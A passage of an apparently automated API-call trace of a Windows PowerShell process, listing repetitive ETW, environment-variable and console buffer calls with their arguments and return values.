0x0 [0312.349] EtwEventActivityIdControl () returned 0x0 [0312.349] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x6b8 [0312.349] EtwEventActivityIdControl () returned 0x0 [0312.349] EtwEventActivityIdControl () returned 0x0 [0312.349] EtwEventActivityIdControl () returned 0x0 [0312.349] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83b630, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0312.349] EtwEventActivityIdControl () returned 0x0 [0312.349] EtwEventActivityIdControl () returned 0x0 [0312.350] EtwEventActivityIdControl () returned 0x0 [0312.350] EtwEventActivityIdControl () returned 0x0 [0312.350] EtwEventActivityIdControl () returned 0x0 [0312.350] EtwEventActivityIdControl () returned 0x0 [0312.350] EtwEventActivityIdControl () returned 0x0 [0312.350] EtwEventActivityIdControl () returned 0x0 [0312.350] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83cfd8 | out: lpConsoleScreenBufferInfo=0x1b83cfd8) returned 1 [0312.351] EtwEventActivityIdControl () returned 0x0 [0312.351] EtwEventActivityIdControl () returned 0x0 [0312.351] EtwEventActivityIdControl () returned 0x0 [0312.351] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c3b0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0312.351] EtwEventActivityIdControl () returned 0x0 [0312.351] EtwEventActivityIdControl () returned 0x0 [0312.351] EtwEventActivityIdControl () returned 0x0 [0312.352] EtwEventActivityIdControl () returned 0x0 [0312.352] EtwEventActivityIdControl () returned 0x0 [0312.352] EtwEventActivityIdControl () returned 0x0 [0312.353] EtwEventActivityIdControl () returned 0x0 [0312.353] EtwEventActivityIdControl () returned 0x0 [0312.353] EtwEventActivityIdControl () returned 0x0 [0312.353] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c3b0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0312.353] EtwEventActivityIdControl () returned 0x0 [0312.353] EtwEventActivityIdControl () returned 0x0 [0312.353] EtwEventActivityIdControl () returned 0x0 [0312.364] EtwEventActivityIdControl () returned 0x0 [0312.364] EtwEventActivityIdControl () returned 0x0 [0312.364] EtwEventActivityIdControl () returned 0x0 [0312.365] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83db98 | out: lpConsoleScreenBufferInfo=0x1b83db98) returned 1 [0312.367] GetConsoleOutputCP () returned 0x1b5 [0312.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.367] GetConsoleOutputCP () returned 0x1b5 [0312.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.368] GetConsoleOutputCP () returned 0x1b5 [0312.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.368] GetConsoleOutputCP () returned 0x1b5 [0312.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.369] GetConsoleOutputCP () returned 0x1b5 [0312.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.369] GetConsoleOutputCP () returned 0x1b5 [0312.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.369] GetConsoleOutputCP () returned 0x1b5 [0312.370] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.370] GetConsoleOutputCP () returned 0x1b5 [0312.370] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.370] GetConsoleOutputCP () returned 0x1b5 [0312.371] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.371] GetConsoleOutputCP () returned 0x1b5 [0312.371] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.371] GetConsoleOutputCP () returned 0x1b5 [0312.372] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.372] GetConsoleOutputCP () returned 0x1b5 [0312.372] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.372] GetConsoleOutputCP () returned 0x1b5 [0312.372] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.372] GetConsoleOutputCP () returned 0x1b5 [0312.373] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.373] GetConsoleOutputCP () returned 0x1b5 [0312.374] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.374] GetConsoleOutputCP () returned 0x1b5 [0312.374] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.374] GetConsoleOutputCP () returned 0x1b5 [0312.375] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.375] GetConsoleOutputCP () returned 0x1b5 [0312.375] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.375] GetConsoleOutputCP () returned 0x1b5 [0312.375] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.376] GetConsoleOutputCP () returned 0x1b5 [0312.376] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.376] GetConsoleOutputCP () returned 0x1b5 [0312.376] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.376] GetConsoleOutputCP () returned 0x1b5 [0312.377] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.377] GetConsoleOutputCP () returned 0x1b5 [0312.377] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.377] GetConsoleOutputCP () returned 0x1b5 [0312.378] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.378] GetConsoleOutputCP () returned 0x1b5 [0312.378] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.378] GetConsoleOutputCP () returned 0x1b5 [0312.379] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.379] GetConsoleOutputCP () returned 0x1b5 [0312.379] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.379] GetConsoleOutputCP () returned 0x1b5 [0312.379] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.380] GetConsoleOutputCP () returned 0x1b5 [0312.380] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.380] GetConsoleOutputCP () returned 0x1b5 [0312.380] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.380] GetConsoleOutputCP () returned 0x1b5 [0312.381] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.381] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.381] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.382] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.382] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.383] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.383] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.383] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.384] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.384] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.385] GetConsoleOutputCP () returned 0x1b5 [0312.385] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.385] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.386] CoTaskMemFree (pv=0x1ad7bc60) [0312.386] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x27fd9dc*, nNumberOfCharsToWrite=0x45, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x27fd9dc*, lpNumberOfCharsWritten=0x1b83da58*=0x45) returned 1 [0312.387] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.388] GetConsoleOutputCP () returned 0x1b5 [0312.389] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.389] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.390] CoTaskMemFree (pv=0x1ad7bc60) [0312.390] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.391] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.391] GetConsoleOutputCP () returned 0x1b5 [0312.392] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.392] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.393] CoTaskMemFree (pv=0x1ad7bc60) [0312.393] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.393] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.394] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.394] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.395] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.395] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.395] GetConsoleOutputCP () returned 0x1b5 [0312.396] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.396] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.397] CoTaskMemFree (pv=0x1ad7bc60) [0312.397] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.398] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.398] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.399] GetConsoleOutputCP () returned 0x1b5 [0312.399] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.399] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.400] CoTaskMemFree (pv=0x1ad7bc60) [0312.400] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.401] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.401] GetConsoleOutputCP () returned 0x1b5 [0312.402] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.402] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.402] CoTaskMemFree (pv=0x1ad7bc60) [0312.403] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.403] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.403] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.404] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.404] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.406] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.406] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.407] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.407] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.407] GetConsoleOutputCP () returned 0x1b5 [0312.408] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.408] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.409] CoTaskMemFree (pv=0x1ad7bc60) [0312.409] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x27fda84*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x27fda84*, lpNumberOfCharsWritten=0x1b83da58*=0x10) returned 1 [0312.410] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.410] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.411] GetConsoleOutputCP () returned 0x1b5 [0312.411] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.411] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.412] CoTaskMemFree (pv=0x1ad7bc60) [0312.412] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.412] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.413] GetConsoleOutputCP () returned 0x1b5 [0312.413] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.413] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.414] CoTaskMemFree (pv=0x1ad7bc60) [0312.414] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.415] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.415] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.416] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.416] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.416] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.417] GetConsoleOutputCP () returned 0x1b5 [0312.417] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.418] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.419] CoTaskMemFree (pv=0x1ad7bc60) [0312.419] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.419] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.420] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9b8 | out: lpConsoleScreenBufferInfo=0x1b83d9b8) returned 1 [0312.420] GetConsoleOutputCP () returned 0x1b5 [0312.421] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.421] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d8b0 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d8b0) returned 1 [0312.422] CoTaskMemFree (pv=0x1ad7bc60) [0312.422] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d7d8 | out: lpConsoleScreenBufferInfo=0x1b83d7d8) returned 1 [0312.422] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: lpConsoleScreenBufferInfo=0x1b83da18) returned 1 [0312.423] GetConsoleOutputCP () returned 0x1b5 [0312.423] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.423] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8a0 | out: lpWriteRegion=0x1b83d8a0) returned 1 [0312.424] CoTaskMemFree (pv=0x1ad7bc60) [0312.424] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.424] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.425] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.425] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.425] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.426] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.426] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.427] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.427] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.428] GetConsoleOutputCP () returned 0x1b5 [0312.428] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.428] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.429] CoTaskMemFree (pv=0x1ad7bc60) [0312.429] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x27fdac4*, nNumberOfCharsToWrite=0x4b, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x27fdac4*, lpNumberOfCharsWritten=0x1b83da58*=0x4b) returned 1 [0312.430] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.430] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.431] GetConsoleOutputCP () returned 0x1b5 [0312.431] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.431] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.432] CoTaskMemFree (pv=0x1ad7bc60) [0312.432] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.432] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.433] GetConsoleOutputCP () returned 0x1b5 [0312.433] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.433] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.434] CoTaskMemFree (pv=0x1ad7bc60) [0312.434] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.435] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.435] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.436] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.437] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.437] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.438] GetConsoleOutputCP () returned 0x1b5 [0312.438] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.438] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: lpWriteRegion=0x1b83d8f0) returned 1 [0312.439] CoTaskMemFree (pv=0x1ad7bc60) [0312.439] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x213ef44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b83daf8, lpReserved=0x0 | out: lpBuffer=0x213ef44*, lpNumberOfCharsWritten=0x1b83daf8*=0x1) returned 1 [0312.440] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da18 | out: 